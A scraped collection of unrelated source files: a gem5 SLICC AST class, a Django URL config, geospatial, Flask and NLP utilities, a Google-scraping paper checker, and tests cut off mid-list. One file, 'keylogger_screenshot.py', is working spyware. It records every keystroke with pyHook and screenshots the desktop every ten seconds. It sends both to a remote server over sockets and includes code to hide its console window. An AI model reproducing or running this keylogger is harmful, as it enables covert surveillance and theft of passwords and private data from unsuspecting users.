SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom slicc.ast.StatementAST import StatementAST\nfrom slicc.symbols import Var\n\n\nclass DeferEnqueueingStatementAST(StatementAST):\n def __init__(self, slicc, queue_name, type_ast, statements):\n super().__init__(slicc)\n\n self.queue_name = queue_name\n self.type_ast = type_ast\n self.statements = statements\n\n def __repr__(self):\n return \"[DeferEnqueueingStatementAst: %s %s %s]\" % (\n self.queue_name,\n self.type_ast.ident,\n self.statements,\n )\n\n def generate(self, code, return_type, **kwargs):\n code(\"{\")\n code.indent()\n self.symtab.pushFrame()\n\n msg_type = self.type_ast.type\n\n # Add new local var to symbol table\n v = Var(\n self.symtab,\n \"out_msg\",\n self.location,\n msg_type,\n \"*out_msg\",\n self.pairs,\n )\n self.symtab.newSymbol(v)\n\n # Declare message\n code(\n \"std::shared_ptr<${{msg_type.c_ident}}> out_msg = \"\n \"std::make_shared<${{msg_type.c_ident}}>(clockEdge());\"\n )\n\n # The other statements\n t = self.statements.generate(code, None)\n self.queue_name.assertType(\"OutPort\")\n\n code(\n \"(${{self.queue_name.var.code}}).deferEnqueueingMessage(addr, \"\n \"out_msg);\"\n )\n\n # End scope\n self.symtab.popFrame()\n code.dedent()\n code(\"}\")\n\n def findResources(self, resources):\n var = self.queue_name.var\n res_count = int(resources.get(var, 0))\n resources[var] = str(res_count + 1)\n","sub_path":"src/mem/slicc/ast/DeferEnqueueingStatementAST.py","file_name":"DeferEnqueueingStatementAST.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"649396605","text":"#!/usr/bin/env ipython\n\n\"\"\"Basic example\n\nSets up a transformer that computes a result based on two inputs\nThe input and the transformation code is edited live in a GUI\n\"\"\"\n\nfrom seamless import context, cell, pythoncell, transformer\nfrom seamless.lib import edit, display\n\nctx = context()\n\n# Create 3 int cells: a=2, b=3, and result\nctx.a = cell(\"int\").set(2)\nctx.b = cell(\"int\").set(3)\nctx.result = cell(\"int\")\n\n# Set up a transformer that computes \"result\" as a function of \"a\" and \"b\"\nt = ctx.transform = transformer({\n \"a\": {\"pin\": \"input\", \"dtype\": \"int\"},\n \"b\": {\"pin\": \"input\", \"dtype\": \"int\"},\n \"result\": {\"pin\": \"output\", \"dtype\": \"int\"}\n})\n\n# Connect the cells to the transformer pins\nctx.a.connect(t.a)\nctx.b.connect(t.b)\nt.result.connect(ctx.result)\n\n# Every transformer has an implicit extra input pin, called \"code\"\n# It must be connected to a Python cell\nctx.formula = pythoncell().set(\"return a + b\")\nctx.formula.connect(t.code)\n\n# Transformers execute asynchronously; ctx.equilibrate() will wait until all\n# transformations have finished\nctx.equilibrate()\n\n# The result cell will now have been computed\nprint(ctx.result.value) # 5\n\n# Updating either input automatically recomputes the result\nctx.a.set(10)\nctx.b.set(20)\nctx.equilibrate()\nprint(ctx.result.value) # 30\n\n# Updating the code also automatically recomputes the result\nctx.formula.set(\"\"\"\ndef fibonacci(n):\n def fib(n):\n if n <= 1:\n return [1]\n elif n == 2:\n return [1, 1]\n else:\n fib0 = fib(n-1)\n return fib0 + [ fib0[-1] + fib0[-2] ]\n fib0 = fib(n)\n return fib0[-1]\nreturn fibonacci(a) + fibonacci(b)\n\"\"\")\nctx.equilibrate()\nprint(ctx.result.value) # 6820\n\n# The inputs and the result and code can be edited/shown in a GUI\n# This automatically recomputes the result\nctx.gui = context() # Create a subcontext to organize our cells better\nctx.gui.a = edit(ctx.a, \"Input a\")\nctx.gui.b = edit(ctx.b, \"Input b\")\nctx.gui.result = display(ctx.result, \"Result\")\n\n# Same for the code, this creates a text editor\n# In this case, the code is updated as soon as you press Ctrl+S or click \"Save\"\nctx.gui.formula = edit(ctx.formula, \"Transformer code\")\n\n# The source code of each editor is itself a seamless cell that can be edited\n# Editing its source code immediately changes the other window!\ntext_editor_code = ctx.gui.formula.rc.code_start.cell()\nctx.gui.text_editor = edit(text_editor_code, \"Text editor source code\")\n\n# The entire context can be saved in a file\nctx.tofile(\"basic.seamless\")\n\n# The context can later be loaded with:\n# ctx = seamless.fromfile(\"basic.seamless\")\n","sub_path":"OLD/examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"264101281","text":"\"\"\"sogeun URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom sgapp import views\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.signin, name=\"signin\"),\n path('home/', views.home, name=\"home\"),\n path('new', views.new, name=\"new\"),\n path('signup/', views.signup, name=\"signup\"),\n path('signout/', views.signout, name=\"signout\"),\n path('signin/', views.signin, name=\"signin\"),\n path('mypage/', views.mypage, name=\"mypage\"),\n path('change_pw/', views.change_pw, name=\"change_pw\"),\n path('', views.detail, name=\"detail\"),\n path('edit/', views.edit, name=\"edit\"),\n path('delete/', views.delete, name=\"delete\"),\n path('c_create/', views.c_create, name=\"c_create\"),\n path('search/', views.search, name=\"search\"),\n path('like/', views.like, name=\"like\"),\n path('unlike/', views.unlike, name=\"unlike\"),\n]\nurlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"sogeun/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"103408022","text":"\"\"\" This function attributes a drainage network with drainage area values for each slope. \"\"\"\n\n#imports\nimport geopandas as gpd\nfrom rasterstats import zonal_stats\nimport os\n\n\ndef add_da(network, da, sref):\n \"\"\"\n This function attributes each reach of a drainage network with a value representing the\n contributing upstream drainage area.\n PARAMS\n :network: string - path to a drainage network shapefile\n :da: string - path to a drainage area raster\n :sref: dict - spatial reference for files of form {'init':'epsg:'}\n :return:\n \"\"\"\n\n # read in network and check for projection\n flowlines = gpd.read_file(network)\n if flowlines['geometry'].crs == sref:\n pass\n else:\n flowlines = flowlines.to_crs(sref)\n\n # list to store da values\n da_list = []\n\n # iterate through each network segment, obtain da value and add to list\n for i in flowlines.index:\n segment = flowlines.loc[i]\n\n # buffer segment to account for positional innacuracy between da raster and network\n seg_geom = segment['geometry']\n buf = seg_geom.buffer(30) # 30 m buffer can change this value\n\n zs = zonal_stats(buf, da, stats=\"count min mean max median\")\n da_value = zs[0].get('max')\n\n da_list.append(da_value)\n\n # add da values to network attribute table\n flowlines['Drain_Area'] = da_list\n flowlines.to_file(network)\n\n return\n\n\n","sub_path":"useful_functions/da_network_attribute.py","file_name":"da_network_attribute.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"241556276","text":"from googletrans import Translator\nfrom datetime import date\nimport os\nimport sys\n\n# 宣告Google翻譯object\nTrans = Translator()\n\nfilename = input('輸入紀錄名稱(若留白,預設以 \"年-月-日-流水號\" 命名):')\n\n# 若紀錄存在,讀取\nif(os.path.isfile('./record/'+filename)):\n fout = open('./record/'+filename,'a')\n\n# 若紀錄不存在,建立新檔案\nelse:\n if(filename == ''):\n # 以日期作為檔名\n today = date.today()\n filename = today.isoformat()\n # 流水號處理\n i = 1\n check_file = './record/'+filename+'-'+str(i)\n while(os.path.isfile(check_file)):\n i+=1\n check_file = './record/'+filename+'-'+str(i)\n # 檢查並建立record資料夾\n try:\n fout = open('./record/'+filename+'-'+str(i),'a')\n except:\n os.mkdir('./record')\n fout = open('./record/'+filename+'-'+str(i),'a')\n else:\n # 檢查並建立record資料夾\n try:\n fout = open('./record/'+filename,'a')\n except:\n os.mkdir('./record')\n fout = open('./record/'+filename,'a')\n\nprint('----------------')\nwhile True:\n try:\n data = input()\n except:\n break\n translated_data = Trans.translate(data,dest='zh-TW').text\n print(translated_data)\n print('----------------')\n if(data != translated_data):\n print(data, file = fout)\n print(translated_data, file = fout)\n print('----------------', file = fout)\nprint('recording as ' + './record/' + filename + ' ...')\nfout.close()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"618040784","text":"from flask import Blueprint, request, jsonify\nfrom flask_jwt_extended import (\n get_jwt_identity,\n jwt_required\n)\nimport requests\nimport os\n\ngooglemap_api_blueprint = Blueprint(\"googlemap_api\",\n __name__,\n template_folder=\"templates\")\n\n\n@googlemap_api_blueprint.route(\"/\",methods=[\"POST\"])\n@jwt_required\ndef serch():\n\n place = request.json.get('place', None)\n key=os.environ.get('GoogleAPI')\n\n # have to be raplaced with my key\n r = requests.get(f'https://maps.googleapis.com/maps/api/geocode/json?address={place}&key={key}')\n return r.text\n\n ","sub_path":"instagram_api/blueprints/googlemap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"403817529","text":"# coding:utf-8\n\nimport os\n\nif __name__ == \"__main__\":\n i = 0\n while i < 106:\n file_name = '000' + str(i).zfill(3) + '_0'\n dir_name = '/data/11084769/url_data/url_2018_1205_billion/'\n cmd1 = \"cat {0}|cut -f 1 >>{1}{0}\".format(file_name, dir_name)\n os.system(cmd1)\n i += 1\n","sub_path":"course_test/32_cut_file.py","file_name":"32_cut_file.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"285215381","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\n\n# ********************************************************\n# Script validates if paper title was published or not.\n#\n# Handles rcading input file and checking against\n# Google to determine if previously published or not.\n# If able to process successfully will print results\n# to standard out.\n#\n# python3 pp.py [|\n#\n# input-file: XLS or CVS of papers' corresponding titles to search\n# title: individual paper title (string) to search on\n#\n# Example: python3 pp.py \"Curing Cancer with Bleach\"\n#\n# If successful exit code is 0\n# If fails exit code is > 0\n# ********************************************************\n\nimport requests\nimport io, os, sys, csv, time, calendar\nimport puremagic\nimport urllib.parse\nimport xlrd, mmap\nimport xlsxwriter as xs\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\n\ndef err(s=None):\n \"\"\"\n Converts string to bytes & Outputs to stderr\n \"\"\"\n if not s:\n return\n s= s + \"\\n\"\n os.write(2, s.encode())\n\ndef is_valid_file(fname=None):\n if not fname:\n return False\n fname = fname.strip()\n return os.path.isfile(fname)\n\ndef search(paper_title=None):\n global SEARCH_URL\n global USER_AGENT\n results = []\n\n if not paper_title:\n return results\n\n # encode query string param before search\n params = {'q': paper_title}\n query = urllib.parse.urlencode(params, quote_via=urllib.parse.quote)\n url = SEARCH_URL + query\n #print(url)\n\n # desktop user-agent; expected by google in HTTP header\n headers = {\"user-agent\" : USER_AGENT}\n resp = requests.get(url, headers=headers)\n\n # check if valid response\n if resp.status_code != 200:\n err(\"Failed - unsuccessful response from Google status code: \" + str(resp.status_code))\n return results\n\n # parse HTTP response and pull out search results\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n for g in soup.find_all('div', class_='g'):\n anchors = g.find_all('a')\n spans = g.find_all('span', class_='st')\n if anchors and spans:\n link = anchors[0]['href']\n title = g.find('h3').text\n description = spans[0].text\n #print(\"Link \", link)\n #print(\"Title\", title)\n #print(\"Description\", description)\n item = {\n \"title\": title,\n \"link\": link,\n \"description\": description\n }\n results.append(item)\n return results\n\ndef is_filetype(filename=None, search_str=None):\n \"\"\"\n Applies magic byte (header) inspection to determine if of search file type.\n \"\"\"\n if not search_str:\n return False\n results = puremagic.magic_file(filename)\n for result in results:\n if search_str.lower() in result.name.lower():\n return True\n return False\n\ndef extract_xlsx(fname=None, search_hdrs=None):\n \"\"\"\n Reads file contents and returns a list of pairs including\n each manuscript id and corresponding manuscript title.\n \"\"\"\n results = []\n\n if fname is None or search_hdrs is None:\n err(\"Invalid CSV extraction for filename and column headers: \" + fname + \" \".join(search_hdrs))\n return results\n\n # extract corresponding data rows to columns for specific headers\n wb = xlrd.open_workbook(fname)\n ws = wb.sheet_by_index(0)\n\n # find index headers occur\n headers = []\n for i in range(len(ws.row(0))):\n if ws.row(0)[i].value in search_hdrs:\n item = {\n \"header\": ws.row(0)[i].value,\n \"index\": i\n }\n headers.append(item)\n\n # extract data after first row\n results = []\n for i in range(1, ws.nrows):\n result = {}\n for hdr in headers:\n #print(hdr.get(\"header\"))\n #print(ws.row(i)[hdr.get(\"index\")].value)\n item = {\n hdr.get(\"header\"): ws.row(i)[hdr.get(\"index\")].value\n }\n result.update(item)\n results.append(result)\n\n #print(results)\n return results\n\ndef extract_csv(fname=None, search_hdrs=None):\n '''\n Reads a CSV file and extracts all rows for column header names requested.\n Returns a list of dictionary with column name and corresponding row value in matrix\n '''\n results = []\n\n if fname is None or search_hdrs is None:\n err(\"Invalid CSV extraction for filename and column headers: \" + fname + \" \".join(search_hdrs))\n return results\n\n result = {}\n # extract corresponding data rows to columns for specific headers\n with open(fname, \"r\", encoding=\"utf-8-sig\") as f:\n reader = csv.DictReader(f)\n for line in reader:\n result = dict((k, line[k]) for k in search_hdrs if k in line)\n #print(result)\n results.append(result)\n\n return results\n\n# ----------------------------------------------------------------------\n# M A I N L O G I C\n# ----------------------------------------------------------------------\n\ndef main():\n global SEARCH_URL\n global USER_AGENT\n global FILE_SEARCH_HDRS\n global TITLE\n\n if len(sys.argv) < 2:\n err(\"Invalid input arguments: \" + sys.argv[0] + \" [|]\")\n sys.exit(1)\n\n search_records = []\n input = sys.argv[1]\n\n if is_valid_file(input):\n if input.endswith('.csv'):\n data = extract_csv(input, FILE_SEARCH_HDRS)\n elif input.endswith('.xlsx'):\n data = extract_xlsx(input, FILE_SEARCH_HDRS)\n else:\n err(\"Unsupport file type - cannot convert: \" + input)\n sys.exit(2)\n search_records = data\n else:\n # invalid file not exist - treat cmd line arg as title to search directly via Google\n item = {\n ID: \"NA\",\n AUTHORS: \"NA\",\n TYPE: \"NA\",\n TITLE: input\n }\n search_records.append(item)\n\n # search on title - only initial top 10 results from Google\n hdr_shown = False\n results = []\n\n # output results to XLSX file named current timestamp\n ts = calendar.timegm(time.gmtime())\n wb = xs.Workbook(\"paper-published-\" + str(ts) +\".xlsx\")\n ws = wb.add_worksheet()\n # Add a bold format to use to highlight cells.\n bold = wb.add_format({'bold': True})\n row = 0\n\n for rec in search_records:\n #print(\"Searching: \" + rec[ID] + \"-\" + rec[TITLE])\n results = search(rec[TITLE])\n time.sleep(THROTTLE_SECS) # avoid being blocked by google - rate limit calls\n\n # check direct or partial ratio match on title\n for result in results[0:1]:\n if rec[TITLE] in result[\"title\"] is False:\n continue\n\n direct = fuzz.ratio(rec[TITLE], result[\"title\"])\n partial = fuzz.partial_ratio(rec[TITLE], result[\"title\"])\n\n # output results\n if not hdr_shown:\n print(\"Paper ID,\", \"Paper Title,\", \"Search Title,\", \"Author, \", \"MS Type, \", \"Direct Match,\", \"Partial Match,\", \"Link, \", \"Description\")\n ws.write(row, 0, \"Paper ID\", bold)\n ws.write(row, 1, \"Paper Title\", bold)\n ws.write(row, 2, \"Search Title\", bold)\n ws.write(row, 3, \"Authors\", bold)\n ws.write(row, 4, \"MS Type\", bold)\n ws.write(row, 5, \"Direct Match\", bold)\n ws.write(row, 6, \"Partial Match\", bold)\n ws.write(row, 7, \"Link\", bold)\n ws.write(row, 8, \"Description\", bold)\n hdr_shown = True\n\n # ignore search results with poor mathes\n if partial < 60:\n continue\n\n print(\"%s,\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",%.2f,%.2f,%s,%s\" % (rec[ID], rec[TITLE], result[\"title\"], rec[AUTHORS], rec[TYPE], direct, partial, result[\"link\"], result[\"description\"]))\n\n row += 1\n ws.write(row, 0, rec[ID])\n ws.write(row, 1, rec[TITLE])\n ws.write(row, 2, result[\"title\"])\n ws.write(row, 3, rec[AUTHORS])\n ws.write(row, 4, rec[TYPE])\n ws.write(row, 5, direct)\n ws.write(row, 6, partial)\n ws.write_url(row, 7, result[\"link\"], string=result[\"link\"])\n ws.write(row, 8, result[\"description\"])\n\n wb.close()\n\n sys.exit(0)\n\n# ==========================\n# Global Variables\n# ==========================\nSEARCH_URL = \"https://google.com/search?\"\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\nID = \"Manuscript ID\"\nTITLE = \"Manuscript Title\"\nAUTHORS =\"Author Names\"\nTYPE = \"Manuscript Type\"\nFILE_SEARCH_HDRS = [\n ID,\n TITLE,\n AUTHORS,\n TYPE\n]\nTHROTTLE_SECS = 1\n\nif __name__ == \"__main__\":\n main()\n sys.exit(0)\n","sub_path":"pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":8788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"599747213","text":"from django import forms\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.utils.translation import ugettext, ugettext_lazy as _\r\nfrom django.core.cache import cache\r\nfrom allauth.account.forms import LoginForm\r\n# from simplecaptcha import captcha, captchaform\r\nfrom captcha.fields import CaptchaField\r\nimport logging\r\nfrom .utils import (is_phone_number_valid, generate_new_phone_verification_code)\r\nfrom .models import UserInfo, Demand, econNews\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n\r\nclass MyLoginForm(LoginForm):\r\n # captcha = CaptchaField()\r\n def __init__(self, *args, **kwargs):\r\n super(MyLoginForm, self).__init__(*args, **kwargs)\r\n self.fields[\"captcha\"] = CaptchaField()\r\n\r\nclass MySignupForm(forms.Form):\r\n phonenumber = forms.CharField(label=_(\"Moible Number\"), max_length = 11)\r\n yanzhengma = forms.CharField(label=_(\"Mobile Verification Code\"), max_length=4)\r\n # captcha = CaptchaField(label=\"图形验证码\")\r\n\r\n\r\n def clean_phonenumber(self):\r\n phonenumber = self.cleaned_data['phonenumber']\r\n if not is_phone_number_valid(phonenumber):\r\n raise forms.ValidationError(_(\"Mobile Number Incorrect\"))\r\n return phonenumber\r\n\r\n def clean_yanzhengma(self):\r\n yanzhengma = self.cleaned_data['yanzhengma']\r\n if len(yanzhengma) != 4 or (not yanzhengma.isdigit()):\r\n raise forms.ValidationError(_(\"Error in mobile verification code format\"))\r\n return yanzhengma\r\n\r\n def clean(self):\r\n super(MySignupForm, self).clean()\r\n key = 'phone_reg_code'+str(self.cleaned_data.get('phonenumber'))\r\n code = cache.get(key)\r\n # logger.warning('key:'+key)\r\n # logger.warning('cleaned_data:'+str(self.cleaned_data))\r\n # logger.warning('code from cache:'+code)\r\n if code is None:\r\n raise forms.ValidationError(_(\"Verification code is None\"))\r\n if code != self.cleaned_data.get('yanzhengma'):\r\n raise forms.ValidationError(_(\"Mobile verification failed.\"))\r\n\r\n def signup(self, request, user):\r\n \"\"\" Required, or else it throws deprecation warnings \"\"\"\r\n user.profile = UserInfo.objects.create(user = user)\r\n user.profile.phonenumber = self.cleaned_data['phonenumber']\r\n user.profile.phone_is_verified = True\r\n user.profile.save()\r\n\r\n\r\nclass AjaxForm(forms.Form):\r\n captcha = CaptchaField()\r\n # def save(self):\r\n # pass\r\n","sub_path":"lstngsvc/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"504027900","text":"import pyHook\n#pyxhook = '/home/yash/***/pyxhook/pyxhook/pyxhook.py'\nimport pythoncom\nimport sys\nimport logging\nfrom threading import Thread\nimport socket\nimport os\n#sys.path.append(os.path.dirname(os.path.expanduser(pyxhook)))\n#import pyxhook\nimport pyautogui\nimport time\nimport win32gui, win32con\n\ndef keyboard():\n\tfile = 'output.txt'\n\tf = open(file, \"w+\")\n\n\tdef OnKeyboardEvent(event):\n\t logging.basicConfig(filename=file, level=logging.DEBUG, format='%(message)s')\n\t logging.log(10,chr(event.Ascii))\n\t return True\n\thooks_manager = pyHook.HookManager()\n #hooks_manager = pyxhook.HookManager()\n\thooks_manager.KeyDown = OnKeyboardEvent\n\thooks_manager.HookKeyboard()\n\tpythoncom.PumpMessages()\n\ndef sendKeyLog():\n\twhile True:\n\t\tclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tclient_socket.connect((\"xxx.xxx.xx.xx\", xxxx))\n\n\t\tclient_socket.send(\"txt\".encode())\n\n\t\ttxt = open('output.txt', 'rb')\n\t\twhile True:\n\t\t\tdata = txt.readline(4)\n\t\t\tif not data: \n\t\t\t\tbreak\n\t\t\tclient_socket.send(data)\n\t\t# print(\"log sent\")\n\t\ttxt.close()\n\t\tclient_socket.close()\n\t\ttime.sleep(10)\n\ndef screenshot():\n\ti = 1\n\twhile True:\n\t\tclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tclient_socket.connect((\"xxx.xxx.xx.xx\", xxxxx))\n\n\t\tclient_socket.send(\"png\".encode())\n\t\t\n\t\tscreenshot = pyautogui.screenshot()\n\t\tscreenshot.save('screenshot.png')\n\t\timage = open('screenshot.png', 'rb')\n\n\t\twhile True:\n\t\t data = image.readline(4096)\n\t\t if not data:\n\t\t \tbreak\n\t\t client_socket.send(data)\n\t\timage.close()\n\t\tclient_socket.close()\n\n\t\tos.remove('screenshot.png')\n\t\ttime.sleep(10)\n\t\ti+=1\n\texit()\n\nif __name__ == \"__main__\":\n # Hiding CMD\n\t# hide = win32gui.GetForegroundWindow()\n\t# win32gui.ShowWindow(hide , win32con.SW_HIDE)\n\n\tthread = Thread(target = keyboard)\n\tthread2 = Thread(target = screenshot)\n\tthread3 = Thread(target = sendKeyLog)\n\tthread.start()\n\tthread2.start()\n\tthread3.start()\n","sub_path":"Screenshot-Keylog/keylogger_screenshot.py","file_name":"keylogger_screenshot.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"33773222","text":"from copy import deepcopy\nimport random\nfrom commons import TAG2LABEL, LABEL2TAG, WORD2ID, ID2WORD\n\n\nclass DataManager(object):\n def __init__(self, data_file_path, word2id=WORD2ID, tag2label=TAG2LABEL):\n self.data_file_path = data_file_path\n self.word2id = word2id\n self.tag2label = tag2label\n self.length = None\n self.origin_data = self.build_data()\n self.pp_data = self.preprocess_data()\n\n def build_data(self):\n \"\"\"\n Build word and tag.\n :return:\n \"\"\"\n data = []\n sentence_words, sentence_tags = [], []\n with open(self.data_file_path) as r_file:\n for line in r_file:\n if line == '\\n':\n data.append((sentence_words, sentence_tags))\n sentence_words, sentence_tags = [], []\n else:\n word, tag = line.strip().split()\n sentence_words.append(word)\n sentence_tags.append(tag)\n if len(sentence_words):\n data.append((sentence_words, sentence_tags))\n return data\n\n def preprocess_data(self):\n \"\"\"\n Transfer word+tag to id+label.\n :return:\n \"\"\"\n data = []\n for (sentence_words, sentence_tags) in self.origin_data:\n sentence_ids = []\n sentence_labels = []\n for word in sentence_words:\n sentence_ids.append(self.word2id[word])\n for tag in sentence_tags:\n sentence_labels.append(self.tag2label[tag])\n data.append((sentence_ids, sentence_labels))\n return data\n\n def __iter__(self):\n batch_size = 20\n shuffle = True\n if shuffle:\n data = deepcopy(self.pp_data)\n random.shuffle(data)\n else:\n data = self.pp_data\n\n ids, labels = [], []\n for (sentence_ids, sentence_labels) in data:\n ids.append(sentence_ids)\n labels.append(sentence_labels)\n if len(ids) == batch_size:\n yield ids, labels\n ids, labels = [], []\n\n if len(ids):\n yield ids, labels\n\n def __len__(self):\n if self.length is None:\n self.length = 0\n for _ in self.origin_data:\n self.length += 1\n return self.length\n","sub_path":"slotsfilling/src/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"645988304","text":"import sys, os\nimport cherrypy\n\nfrom useless.base import daemon\n\n\ndef start_server(rootpage, configfile, appname, mainpath=None, pathname=None):\n if mainpath is None:\n mainpath = os.path.join('/usr/share', appname)\n if pathname is None:\n pathname = '%s_PATH' % appname.upper()\n if pathname in os.environ:\n top = os.environ[pathname]\n modpath = os.path.join(top, 'src')\n logfile = os.path.join(top, '%s.log' % appname)\n pidfile = os.path.join(top, '%s.pid' % appname)\n else:\n modpath = mainpath\n logfile = '/var/log/%s.log' % appname\n pidfile = '/var/run/%s.pid' % appname\n sys.path.append(modpath)\n varname = '%s_NODAEMON' % appname.upper()\n if varname not in os.environ:\n daemon.daemonize(stdout=logfile, pidfile=pidfile)\n cherrypy.root = rootpage()\n cherrypy.config.update(file=configfile)\n cherrypy.server.start()\n \n","sub_path":"branch/sqlgen2/useless/webframe/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"363753185","text":"import os\r\nimport re\r\nfrom time import sleep\r\n\r\nfrom pandas import DataFrame, read_csv\r\nimport pytest\r\nfrom hypothesis import given\r\nfrom hypothesis.strategies import integers, text, lists\r\n\r\nfrom ..grizly.drivers.frames_factory import QFrame\r\nfrom ..grizly.sources.filesystem.old_s3 import S3\r\nfrom ..grizly.sources.sources_factory import Source\r\nfrom ..grizly.utils.functions import get_path\r\nfrom ..grizly.config import config\r\n\r\n\r\ndef test_df_to_s3_and_s3_to_file():\r\n s3 = S3(file_name=\"testing_s3_class.csv\", s3_key=\"bulk/\")\r\n df = DataFrame({\"col1\": [1, 2], \"col2\": [3, 4]})\r\n s3.from_df(df, sep=\"\\t\")\r\n\r\n file_path = os.path.join(s3.file_dir, s3.file_name)\r\n\r\n s3.to_file()\r\n\r\n assert df.equals(read_csv(file_path, sep=\"\\t\"))\r\n os.remove(file_path)\r\n\r\n\r\ndef test_can_upload():\r\n s3 = S3(file_name=\"test_s3_2.csv\", s3_key=\"bulk/tests/\", min_time_window=2)\r\n df = DataFrame({\"col1\": [1, 2], \"col2\": [3, 4]})\r\n s3.from_df(df)\r\n\r\n assert not s3._can_upload()\r\n sleep(2)\r\n assert s3._can_upload()\r\n\r\n\r\ndef test_to_rds():\r\n import os\r\n\r\n # print(os.environ)\r\n\r\n dsn = get_path(\"grizly_dev\", \"tests\", \"Chinook.sqlite\")\r\n qf = QFrame(dsn=dsn, db=\"sqlite\", dialect=\"mysql\").from_table(table=\"Track\")\r\n\r\n qf.window(offset=100, limit=30, order_by=[\"TrackId\"])\r\n\r\n qf.assign(LikeIt=\"CASE WHEN GenreId = 5 THEN 1 ELSE 0 END\", dtype=\"INT\")\r\n qf.assign(SpareColumn=\"NULL\")\r\n\r\n qf.rename(\r\n {\r\n field: \"_\".join(re.findall(\"[A-Z][^A-Z]*\", alias)).lower()\r\n for field, alias in zip(qf.get_fields(aliased=False), qf.get_fields(aliased=True))\r\n }\r\n )\r\n\r\n s3_key = \"test/\"\r\n bucket = \"acoe-s3\"\r\n table_parquet = \"grizly_test_parquet\"\r\n table_csv = \"grizly_test_csv\"\r\n schema = \"sandbox\"\r\n path_csv = get_path(\"grizly_test.csv\")\r\n path_parquet = get_path(\"grizly_test.parquet\")\r\n\r\n s3_parquet = S3(\r\n file_name=os.path.basename(path_parquet),\r\n file_dir=os.path.dirname(path_parquet),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n s3_csv = S3(\r\n file_name=os.path.basename(path_csv),\r\n file_dir=os.path.dirname(path_csv),\r\n s3_key=s3_key,\r\n bucket=bucket,\r\n )\r\n\r\n qf.to_parquet(path_parquet)\r\n s3_parquet.from_file(keep_file=False)\r\n s3_parquet.to_rds(dsn=\"redshift_acoe\", table=table_parquet, schema=schema, if_exists=\"replace\")\r\n qf_parquet = QFrame(dsn=\"redshift_acoe\").from_table(table=table_parquet, schema=schema)\r\n assert len(qf_parquet) == 30\r\n\r\n qf.to_csv(path_csv)\r\n s3_csv.from_file(keep_file=False)\r\n s3_csv.to_rds(dsn=\"redshift_acoe\", table=table_csv, schema=schema, if_exists=\"replace\")\r\n qf_csv = QFrame(dsn=\"redshift_acoe\").from_table(table=table_csv, schema=schema)\r\n assert len(qf_csv) == 30\r\n\r\n qf.to_parquet(path_parquet)\r\n s3_parquet.from_file(keep_file=False)\r\n s3_parquet.to_rds(dsn=\"redshift_acoe\", table=table_parquet, schema=schema, if_exists=\"append\")\r\n assert len(qf_parquet) == 60\r\n\r\n qf.rearrange(\r\n [\r\n \"composer\",\r\n \"milliseconds\",\r\n \"bytes\",\r\n \"unit_price\",\r\n \"like_it\",\r\n \"spare_column\",\r\n \"track_id\",\r\n \"name\",\r\n \"album_id\",\r\n \"media_type_id\",\r\n 